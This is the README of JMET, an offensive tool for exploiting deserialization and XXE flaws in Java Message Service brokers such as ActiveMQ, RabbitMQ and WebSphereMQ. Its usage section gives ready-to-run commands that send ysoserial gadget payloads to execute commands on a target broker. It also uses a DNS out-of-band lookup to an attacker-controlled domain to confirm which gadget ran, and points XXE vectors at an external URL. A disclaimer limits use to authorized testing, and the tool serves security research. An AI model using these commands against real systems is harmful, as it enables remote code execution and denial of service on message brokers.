JavaScript:
#JMET
The Java Message Exploitation Tool
____ _______________
/ / |/ / ____/_ __/
__ / / /|_/ / __/ / /
/ /_/ / / / / /___ / /
\____/_/ /_/_____/ /_/
https://github.com/matthiaskaiser/jmet
Description
JMET was released at Blackhat USA 2016 and is an outcome of Code White's research effort presented in the talk "Pwning Your Java Messaging With Deserialization Vulnerabilities". The goal of JMET is to make the exploitation of the Java Message Service (JMS) easy. In the talk more than 12 JMS client implementations where shown, vulnerable to deserialization attacks. The specific deserialization vulnerabilities were found in ObjectMessage implementations (classes implementing javax.jms.ObjectMessage). The following more or less complete list shows the vulnerable JMS broker client libraries:
Apache ActiveMQ
Redhat/Apache HornetQ
Oracle OpenMQ
IBM WebSphereMQ
Oracle Weblogic
Pivotal RabbitMQ
IBM MessageSight
IIT Software SwiftMQ
Apache ActiveMQ Artemis
Apache QPID JMS
Apache QPID Client
Amazon SQS Java Messaging
For creating gadget payloads JMET makes use of Chris Frohoffs' Ysoserial.
Supprted JMS client libraries
Apache ActiveMQ
Redhat/Apache HornetQ
Oracle OpenMQ
IBM WebSphereMQ
Oracle Weblogic
Pivotal RabbitMQ
IBM MessageSight
IIT Software SwiftMQ
Apache ActiveMQ Artemis
Apache QPID JMS
Apache QPID Client
Amazon SQS Java Messaging
Dependencies
JMET depends on a lot of libraries :(. For details see the maven pom file.
Installation
Just download jmet-0.1.0-all.jar from here or built it (see "Build instructions").
Usage
$ java -jar target/jmet-0.1.0-all.jar
ERROR d.c.j.JMET [main] Misconfiguration: Missing required options: [-C Custom script exploitation mode, -Y Deser exploitation mode, -X XXE exploitation mode], [-T topic name, -Q queue name], I
usage: jmet [host] [port]
-C,--Custom <scriptname> Custom script exploitation mode
-f,--filter <scriptname> filter script
-I,--impl <arg> ActiveMQ| Artemis| WebSphereMQ| Qpid10|
Qpid09| HornetQ| SwiftMQ| RabbitMQ|
OpenMQ
-pw,--password <pass> password for authentication
-Q,--Queue <name> queue name
-s,--substitute Substituation mode: Use ¡ì¡ì to pass
ysoserial payload name to CMD
-T,--Topic <name> topic name
-u,--user <id> user for authentication
-v,--verbose Running verbose mode
-X,--XXE <URL> XXE exploitation mode
-Xp,--xxepayload <payloadname> Optional: XXE Payload to use EXTERNAL|
PARAMATER| DTD
-Y,--ysoserial <CMD> Deser exploitation mode
-Yp,--payload <payloadname> Optional: Ysoserial Payload to use
BeanShell1| CommonsBeanutils1|
CommonsCollections1|
CommonsCollections2|
CommonsCollections3|
CommonsCollections4|
CommonsCollections5| Groovy1|
Hibernate1| Hibernate2| Jdk7u21| JSON1|
ROME| Spring1| Spring2
-Zc,--channel <channel> channel name (only WebSphereMQ)
-Zq,--queuemanager <name> queue manager name (only WebSphereMQ)
-Zv,--vhost <name> vhost name (only AMQP-Brokers:
RabbitMQ|QPid09|QPid10)
Gadget exploitation mode
Create gadgets for executing "xterm" and send them all to queue "event". As implementation ActiveMQ is choosen, the target system is "jmstarget" listening on port 61616.
$ java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -Y xterm jmstarget 61616
To find out which gadget was executed you can use the "substitution"-mode with an out-of-band channel like DNS. To pass the gadget name to your command use the "¡ì¡ì" string which then gets substituted with the gadget name.
$ java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "nslookup ¡ì¡ì.yourdomain.com" jmstarget 61616
XXE exploitation mode
The XXE exploition mode requires to specify an URL to be resolved as an external entity. The XXE vectors are sent inside a TextMessage.
$ java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -X http://192.168.85.148:8081 jmstarget 61616
Custom exploitation mode
The custom exploitation mode allows to run a custom JavaScript script. The purpose of this mode is to support different serialization formats (JSON, etc.) and custom payloads.
The following example script uses the XML serialization library XStream. The String "Object" is serialized to XML and put into an TextMessage using the de.codewhite.jmet.target.JMSTarget.addTextPayload(String payloadName, String payloadText)-method. Required libraries need to be put into the "external"-directory of JMET.
function payload(target){
var imports = new JavaImporter(java.io, java.lang, com.thoughtworks.xstream);
with (imports) {
xstream = new XStream();
target.addTextPayload("test",xstream.toXML("Object"));
}
}
Filter scripts
Filter scripts are used for modifying "javax.jms.Message"-instances before sent to the target destination. The following Javascript changes the JMSPriority of every message, prints out a string und returns the modified message back.
function filter(message){
message.setJMSPriority(3);
print("Changed Priority")
return message;
}
Build instructions
Please put the following libraries of the commercial brokers into a directory of your choice (e.g. DIR).
com.ibm.mq.allclient.jar (WebSphere MQ)
amqp.jar (SwiftMQ)
jms.jar (SwiftMQ)
swiftmq.jar (SwiftMQ)
Then invoke maven with the property "commercial" set to your path.
$ export MAVEN_OPTS=-Xss10m
$ mvn clean compile assembly:single -Dcommerical=DIR
If you don't want to use the commercial brokers at all you can just delete the following files:
src/main/java/de/codewhite/jmet/target/impl/WebSphereMQTarget.java
src/main/java/de/codewhite/jmet/target/impl/SwiftMQTarget.java
$ export MAVEN_OPTS=-Xss10m
$ mvn clean compile assembly:single
Disclaimer
JMET is a proof-of-concept tool for blackbox testing of JMS destinations. Please use this tool with care and only when authorized. Be aware that sending an invalid message to a JMS destination might result in a denial-of-service state (DOS) of the target system. You have been warned !!!
License
JMET is released under The MIT License (MIT).